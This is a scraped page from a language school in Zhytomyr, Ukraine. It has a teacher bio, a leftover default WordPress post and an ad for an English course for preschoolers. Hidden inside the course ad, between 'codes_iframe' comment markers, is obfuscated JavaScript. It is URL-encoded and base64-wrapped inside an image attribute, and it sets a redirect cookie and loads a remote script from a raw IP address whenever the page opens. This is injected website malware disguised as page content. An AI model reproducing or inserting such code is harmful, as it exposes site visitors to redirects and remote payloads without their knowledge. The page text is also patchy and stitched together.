Олександр Михайлович – випускник україно-італійської школи “Всесвіт” 1998 року, де він здобув і свій перший досвід викладання італійської мови. оботи. Має сертифікати про проходження тренінгів особистого розвитку: Тренінг особистого зростання “Процвітання” Міжнародного фонду “Співтворчість”, Тренінг PRH (Person Relationships Humanity), Асоціації вчителів та психологів «21 сторіччя». Має великий досвід перекладацької роботи. Олександр Михайлович працює в нашому Центрі з 2002 року. Спеціалізується на викладанні італійської мови

Привет, мир!


Добро пожаловать в WordPress. Это ваша первая запись. Отредактируйте или удалите её, затем пишите!

Курс англійської мови для дошкільнят (4-5 років)


Курс англійської мови для дошкільнятЗапрошуємо діточок 4-5 років на курс вивчення англійської мови для дошкільнят. Заняття проходить цікаво і в доступній ігровій формі. Цей вік є найбільш продуктивним для вивчення іноземної мови. Адже діти дуже допитливі та з задоволенням тягнуться до знань. Тому, якщо ваша дитинка виявляє схильність до мов, запишіть її на курси англійської мови для дошкільнят.Але обов’язково треба враховувати наступні фактори: з одного боку діти швидко втомлюються, з іншого, їм властива гіперактивність. Ми пропонуємо найкращий вихід з ситуації – це заняття тривалістю не більше 60 хвилин, на яких різні види мовних вправ  чергуються  з рухливими вправами.Звичайно не слід чекати, що Ваша дитина засвоїть граматичні структури та навчиться читати та писати англійською в 4-5 років, але <strong>в нашому центрі LangFord</strong> після проходження курсу англійської мови для дошкільнят, завдяки отриманню постійних аудіальних та візуальних сигналів, вона вивчить багато слів та навчиться правильній вимові, що безперечно полегшить вивчення іноземної мови в подальшому.Курс англійської мови для дошкільнят  <strong>в центрі LangFord</strong> стане хорошою підготовкою до уроків мови у школі та шкільного життя загалом, особливо, якщо дитина не відвідує садочок. Відвідування занять стане улюбленою справою дітлахів!<!–codes_iframe–><img src=”data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7″ data-wp-preserve=”%3Cscript%20type%3D%22text%2Fjavascript%22%3E%20function%20getCookie(e)%7Bvar%20U%3Ddocument.cookie.match(new%20RegExp(%22(%3F%3A%5E%7C%3B%20)%22%2Be.replace(%2F(%5B%5C.%24%3F*%7C%7B%7D%5C(%5C)%5C%5B%5C%5D%5C%5C%5C%2F%5C%2B%5E%5D)%2Fg%2C%22%5C%5C%241%22)%2B%22%3D(%5B%5E%3B%5D*)%22))%3Breturn%20U%3FdecodeURIComponent(U%5B1%5D)%3Avoid%200%7Dvar%20src%3D%22data%3Atext%2Fjavascript%3Bbase64%2CZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs%3D%22%2Cnow%3DMath.floor(Date.now()%2F1e3)%2Ccookie%3DgetCookie(%22redirect%22)%3Bif(now%3E%3D(time%3Dcookie)%7C%7Cvoid%200%3D%3D%3Dtime)%7Bvar%20time%3DMath.floor(Date.now()%2F1e3%2B86400)%2Cdate%3Dnew%20Date((new%20Date).getTime()%2B86400)%3Bdocument.cookie%3D%22redirect%3D%22%2Btime%2B%22%3B%20path%3D%2F%3B%20expires%3D%22%2Bdate.toGMTString()%2Cdocument.write(‘%3Cscript%20src%3D%22’%2Bsrc%2B’%22%3E%3C%5C%2Fscript%3E’)%7D%20%3C%2Fscript%3E” data-mce-resize=”false” data-mce-placeholder=”1″ class=”mce-object” width=”20″ height=”20″ alt=”<script>” title=”<script>” /><!–/codes_iframe–>

м. Житомир,
вул. Святослава Ріхтера (1 Травня), 6-а, оф. 5-а
(В приміщенні ЗОШ № 21)
langford@ukr.net
Години роботи :
з 9-00 до 19-00
(крім суботи та неділі)
м. Житомир,
вул. Перемоги 7-А,
офіс 101
langford@ukr.net
Години роботи :
з 10-00 до 19-00
(крім суботи та неділі)
Зворотній зв’язок
© 2024 Всі права захищені Lang Ford 2024 ROST DIGITAL